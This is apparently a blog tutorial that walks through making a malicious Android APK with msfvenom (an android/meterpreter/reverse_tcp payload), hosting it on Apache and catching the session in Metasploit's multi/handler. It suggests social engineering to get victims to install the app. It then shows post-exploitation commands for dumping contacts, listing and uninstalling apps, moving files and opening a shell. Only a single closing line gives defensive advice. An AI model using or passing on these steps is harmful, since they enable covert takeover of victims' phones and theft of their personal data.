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Now a days each and everyone is using Android smart phones, which diverted the attention of hackers to hack android phone for information. Often we find apps that has malicious intensions like capturing sceens, accessing text messages, call logs camera etc.
Sometimes we may not see such apps in the front face of the phone. Now a days hackers use more sophosticated methods to extract information even by forcing us to give access to the apps.
In this session we are going to see how hackers create an app with maliicious payloads which gives full access to the hacker.
At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘’.
Start your terminal and type #ifconfig and find your ipaddress
You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.
After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:
# msfvenom –p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R> /var/www/html/maliciousapp.apk
This would take some time to generate an apk file of almost ten thousand bytes.
Before launching attack, we need to check the status of the apache server. Type command:
# service apache2 status
All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.
In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.
After downloading it successfully, select the app to install.
So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.
Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.
Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.
Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.
You can interact with any session by typing sessions -i [session ID]
After entering the session, type “help” to list down all the commands we can put forward in this session.
You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.
Some powerful system commands to get user ID, get a shell or getting the complete system information.
Type “app_list” and it will show you all the installed apps on the device
We also have the power to uninstall any app from the Android device
Now let extract some contacts from the target device by typing “dump” and double tab
It will show all the options to extract from the device. Type “dump_contacts” and enter
It will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”
There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.
A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.